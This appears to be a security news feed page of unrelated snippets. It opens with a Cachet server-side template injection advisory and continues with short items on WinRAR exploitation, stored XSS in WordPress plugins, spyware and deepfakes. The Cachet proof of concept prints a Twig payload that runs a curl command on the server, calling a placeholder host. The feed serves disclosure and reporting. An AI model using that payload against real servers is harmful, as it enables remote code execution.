#web

### Summary A template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version. Within `/cachet/app/Http/Routes/ApiRoutes.php`, and attacker could control `template` input which is passed to `laravel's` dispatched handler `/cachet/app/Bus/Handlers/Commands/Incident/CreateIncidentCommandHandler.php`. If an attacker is able to control this data, they may be able to trigger a server-side template injection vulnerability which can lead to remote code execution. This vulnerability does not exist within the [Twig](https://twig.symfony.com/) library itself, but exists during the process of the [Cachet](https://github.com/cachethq/cachet) processing of the data without any filtration. This has been patched in Cachet version 2.4. ### PoC 1. Log in as a default user (non-admin); 2. Create an incident with name `slug1` and with content: `{{ ['curl yourhost.com','']|sort('system') }}` or with any other ...

Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems. "The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as

Auth. (editor+) Stored Cross-Site Scripting (XSS) vulnerability in Codedrafty Mediabay – Media Library Folders plugin <= 1.6 versions.

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Timely - Appointment software Timely Booking Button plugin <= 2.0.2 versions.

By Waqas If you've downloaded a rocket alert app from a third-party source, ensure it's spyware-free and delete it from your device. This is a post from HackRead.com Read the original post: Hackers Target Israeli Rocket Alert App Users with Spyware

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Tyche Softwares Abandoned Cart Lite for WooCommerce plugin <= 5.15.2 versions.

Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Robin Wilson bbp style pack plugin <= 5.6.7 versions.

Auth. (contributo+) Stored Cross-Site Scripting (XSS) vulnerability in Cytech BuddyMeet plugin <= 2.2.0 versions.

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Gopi Ramasamy Tiny Carousel Horizontal Slider plugin <= 8.1 versions.

New research shows the number of deepfake videos is skyrocketing—and the world's biggest search engines are funneling clicks to dozens of sites dedicated to the nonconsensual fakes.